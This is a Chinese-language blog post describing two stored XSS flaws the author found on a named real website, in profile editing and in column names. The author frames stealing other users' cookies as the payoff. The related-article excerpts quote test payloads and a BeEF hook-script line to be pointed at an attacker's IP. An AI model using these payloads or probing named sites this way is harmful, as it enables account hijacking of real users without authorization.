遇到了一个存在XSS(存储型)漏洞的网站

最新推荐文章于 2024-04-12 11:56:17 发布
最新推荐文章于 2024-04-12 11:56:17 发布
阅读量1k 收藏 3
点赞数
分类专栏: 渗透 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64311421/article/details/131921599
版权

第一个漏洞self xss(存储型)

存在漏洞的网站是https://www.kuangstudy.com/
在这里插入图片描述
在这里插入图片描述
然后点击个人设置
在这里插入图片描述
在编辑主页中,我们可以用最简单的script语句进行注入,提交;
在这里插入图片描述
在这里插入图片描述
出现弹窗,说明它已经把代码进行解析,存入到它的数据库中了。
总结一下,此漏洞是self xss,只能自己打自己,目的是获取你自己的cookie,拿到你自己的cookie可以登录你自己的账号。相当于没有威胁。

第二个漏洞典型的xss漏洞(存储型)

添加专栏,专栏名字就可以实现存储型XSS。
在这里插入图片描述

在我的里面点击刚创建的专栏
在这里插入图片描述
svg是画图标签,说一可以看见恶意代码执行了。
在这里插入图片描述
总结:这个专栏发给别人或者别人浏览,它的cookie就会被你打到,从而你就可以随时登录它的账号。这个相比第一个self xss来说,第二个是一个实实在在的存储型xss漏洞。

流年ꦿ
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB常见漏洞XSS(靶场篇)
One-Fox安全团队的博客
06-30 1893
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为承担任何责任,一旦造成后果请自行承担!
XSS漏洞分类及危害
热门推荐
lay_loge的博客
05-22 3万+
常见的XSS漏洞分为存储、反射、DOM三种。 (1)反射XSS 用户在请求某条URL地址的时候,会携带一部分数据。当客户端进行访问某条链接时,攻击者可以将恶意代码植入到URL,如果服务端未对URL携带的参数做判断或者过滤处理,直接返回响应页面,那么XSS攻击代码就会一起被传输到用户的浏览器,从而触发反射XSS。例如,当用户进行搜索时,返回结果通常会包括用户原始的搜索内容,如果攻击者精心构...
DOYO网站xss漏洞测试
明哥哥知识分享
08-27 1149
一、寻找xss漏洞 一般想获取最高权限,就要找存储xss漏洞,这样的漏洞是服务器和浏览器进行数据交换的,有利于数据写入进去。一般留言板、评论区可能性最大。 1、评论区 <script>alert(1111)</script> 弹出1111,证明咱们找到评论区xss漏洞了。并且代码也执行了。 2、留言板 aaaaa<script>alert(222)</script> 由于这个留言需要管理员审查,我们去后台看一下,有没有弹窗。
史上最全网络安全站点集合_网络安全漏洞网站(1)
最新发布
m0_60147147的博客
04-12 1147
http://www.jeehsu.com/(几许博客)http://www.cnseay.com/(法师博客)exehack.net(小残博客)知道创宇(知道创宇博客)http://www.keen8.com/(kee8博客 )http://0ke.org/( 0ke博客 )ror体育-官网(影风’s Blog)http://www.weixianmanbu.com/(黑客技术博客)
XSS数据接收网站——XSS在线平台
p36273的博客
06-17 4884
平台的网址是:链接:XSS在线平台。
渗透工具开发——XSS平台的命令行实现
Spontaneous_0的博客
02-20 1101
渗透工具开发——XSS平台的命令行实现
XSS漏洞攻防
weixin_59616219的博客
12-20 452
XSS漏洞攻防
记录存在 XSS漏洞网站列表
weixin_30649641的博客
06-11 456
http://www.xssed.com/archive/special=1/ 转载于:https://www.cnblogs.com/allyesno/archive/2007/06/11/779451.html
XSS
Seizerz的博客
09-03 963
一、什么是 XSS Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。 所以,网页上哪些部分会引起XSS攻击?简单来说,任何可以输入的地方都有可能引起,包括URL! 二、XSS 常见的注入...
xss基础之xss网站找寻
jiangliuzheng的专栏
07-14 2877
1、通过google搜索xss网站 关键字:inurl: asp?bigclassname 原理:要懂得bigclassname参数是网站显示的目录等参数,一般会在网页中显示出相应的参数内容,当后台get数据时未对参数进行特殊字符进行过滤时,就有可能通过对参数进行特殊赋值,插入脚本语句就能产生出执行脚本的功能。同样的参数可以还有name、product等,不过要根据实际情况 3、有时
xss漏洞之——XSS平台搭建
wsnbbz的博客
03-04 4944
前言 经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个: 1.kali下的beef (1)kali命令行里输入beef-xss,得到一个脚本 <script src="http://127.0.0.1:3000/hook.js"></script> 将127.0.0.1改为kali的ip,之后进行植入 (2)kali...
xss平台搭建源码,xss漏洞练习
06-03
xss平台搭建源码,用于练习xss漏洞,适用于网络安全学科的爱好者和学生,下载后解压缩到www目录下,需要将xss-sql导入数据库,并更改一下源码部分内容,很容易。最后要配置伪静态文件。
XSS练习平台
07-17
XSS练习平台、XSS练习平台XSS练习平台XSS练习平台XSS练习平台XSS练习平台
XSS.zip_XSS_c xss
09-24
2. **存储XSS(Persistent XSS)**:又称持久性XSS,攻击者将恶意脚本存储在服务器端,例如在论坛发帖、评论区留言等。当其他用户浏览这些页面时,恶意脚本会自动执行。 3. **DOMXSS(DOM-Based XSS)**:不...
phantomjs-burpsuite安装XSS所需插件
03-15
这包括理解不同类XSS攻击(存储、反射和DOM),熟悉插件提供的各种扫描模式和策略,以及如何解释和处理扫描结果。 8. 在实际使用过程中,可能会遇到一些问题,如插件不兼容、扫描效果不佳等。这时,你...
xss-lab全通关教程
05-07
反射XSS是通过诱使用户点击含有恶意代码的链接来触发,而存储XSS则是在网站的数据库中注入代码,当其他用户查看时触发。DOMXSS则与前两者不同,它不涉及服务器,而是利用了JavaScript对DOM(Document Object ...
安装xss-labs ppt手册
10-22
为了学习和研究XSS漏洞XSS-Labs是一个优秀的实践平台,它提供了多种不同类XSS挑战,帮助安全从业者提升检测和防御XSS攻击的能力。 **XSS-Labs安装步骤** 1. **下载靶场文件**:首先,你需要找到XSS-Labs的...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞XSS攻击通常分为三种类:...
xss漏洞 (跨站脚本攻击)
qq_59607911的博客
10-17 248
标签:</script><script>alert(1)
下载有xss漏洞网页源码
07-07
对于下载含有XSS漏洞的网页源码,首先要明确XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过注入恶意脚本代码,使用户在浏览网页时受到攻击。 为了下载含有XSS漏洞的网页源码,我们可以按照以下步骤操作: 1. 确定目标网页:首先,需要明确要下载的网页具有XSS漏洞。通常,这需要通过漏洞扫描工具或者手动分析目标网站的源码来判断。 2. 搭建测试环境:为了避免网站的实际访问影响到我们的操作,我们可以搭建本地测试环境。使用Web服务器软件(如Apache、Nginx等)和相应的网页源码托管目录,搭建一个本地网站。 3. 复制目标网页:在搭建的本地测试环境中,通过浏览器访问目标网页,并将其完整的HTML源码复制下来。 4. 编辑源码:使用文本编辑器打开复制的HTML源码文件,并进行相关修改。由于涉及到安全漏洞,建议仅用于学习、研究和测试目的,并遵守法律法规。 5. 保存并访问:保存修改后的源码文件,并重新启动搭建的本地测试环境。通过浏览器访问本地测试环境中的网页,即可下载含有XSS漏洞的网页源码。 需要提醒的是,下载、分析和利用网页源码是一个需谨慎对待的行为。未经授权或滥用此技术可能会导致法律责任。因此,在进行任何相关活动之前,请确保了解相关法律法规,并获得相关授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流年ꦿ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值